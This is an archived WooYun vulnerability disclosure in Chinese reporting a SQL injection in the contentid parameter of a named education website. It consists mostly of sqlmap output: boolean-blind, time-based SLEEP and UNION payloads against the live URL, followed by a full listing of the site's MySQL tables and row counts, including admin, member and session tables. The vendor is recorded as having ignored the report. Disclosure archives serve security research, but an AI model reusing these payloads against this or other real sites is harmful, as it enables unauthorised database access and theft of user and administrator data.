乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-14: 细节已通知厂商并且等待厂商处理中 2015-12-19: 厂商已经主动忽略漏洞,细节向公众公开
http://www.edufe.com.cn/special/mxxhg2014/show.php?contentid=1710
sqlmap resumed the following injection point(s) from stored session:---Parameter: contentid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: contentid=1710 AND 7126=7126 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: contentid=1710 AND (SELECT * FROM (SELECT(SLEEP(5)))zRwL) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: contentid=-7376 UNION ALL SELECT NULL,CONCAT(0x716a766271,0x715948496e6541446943,0x717a6a6b71),NULL,NULL,NULL,NULL,NULL,NULL-- ---back-end DBMS: MySQL 5.0.12Database: edufe+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| phpcms_ads_stat | 6059965 || mobile_log | 2350968 || phpcms_log | 17111 || phpcms_attachment | 7959 || phpcms_search_words | 7806 || edufe_search | 7647 || phpcms_stu_up_active | 7431 || mobile_course | 6835 || phpcms_school | 5382 || phpcms_announce_right | 3286 || phpcms_announce | 3191 || phpcms_lcenter_dynamic | 2526 || phpcms_member_group_priv | 2514 || phpcms_vote_useroption | 2505 || phpcms_content_count | 2442 || phpcms_content | 2436 || phpcms_c_news | 2434 || phpcms_content_tag | 2384 || phpcms_stu_up_active_ip | 2077 || phpcms_honor_people | 2059 || phpcms_admin_role_priv | 1676 || phpcms_keyword | 1339 || phpcms_lcenter | 960 || phpcms_lcenter_activity | 749 || phpcms_lcenter_teacher | 693 || phpcms_teacher | 693 || phpcms_scheme | 595 || phpcms_lcenter_photo | 594 || phpcms_photo | 593 || phpcms_activity | 518 || phpcms_menu | 403 || phpcms_content_position | 381 || phpcms_faq | 222 || phpcms_myclassroom_courses | 208 || phpcms_member_info | 197 || phpcms_member | 190 || phpcms_member_cache | 190 || phpcms_vote_data | 171 || jw_SpecCourResource | 162 || phpcms_admin_role | 159 || phpcms_admin | 155 || phpcms_category | 138 || phpcms_honor | 126 || phpcms_enroll | 94 || phpcms_award | 93 || phpcms_download | 89 || phpcms_ads | 65 || phpcms_stu_up_lcenter | 62 || phpcms_role | 57 || phpcms_author | 55 || phpcms_tea_up_lcenter | 54 || phpcms_vote_option | 53 || phpcms_dynamic | 50 || phpcms_session | 47 || phpcms_type | 46 || phpcms_member_detail | 40 || phpcms_area | 34 || mobile_opencourse_video | 31 || phpcms_urlrule | 29 || phpcms_link | 27 || phpcms_model_field | 27 || phpcms_manual | 26 || phpcms_myclassroom_singlecourse | 24 || phpcms_process_status | 21 || phpcms_module | 20 || phpcms_copyfrom | 16 || phpcms_complaint | 13 || phpcms_vote_subject | 13 || phpcms_ads_place | 10 || phpcms_block | 10 || phpcms_editor_data | 10 || phpcms_datelist | 9 || phpcms_status | 9 || phpcms_myclassroom_vk | 7 || phpcms_tea_up_active | 7 || phpcms_lcweb | 6 || phpcms_member_group | 6 || phpcms_process | 6 || mobile_opencourse | 3 || phpcms_position | 3 || phpcms_workflow | 3 || phpcms_lcweb_conf | 2 || phpcms_model | 2 || phpcms_lcenter_relation | 1 || search_counter | 1 |+---------------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-12-19 11:26
漏洞Rank:4 (WooYun评价)
暂无
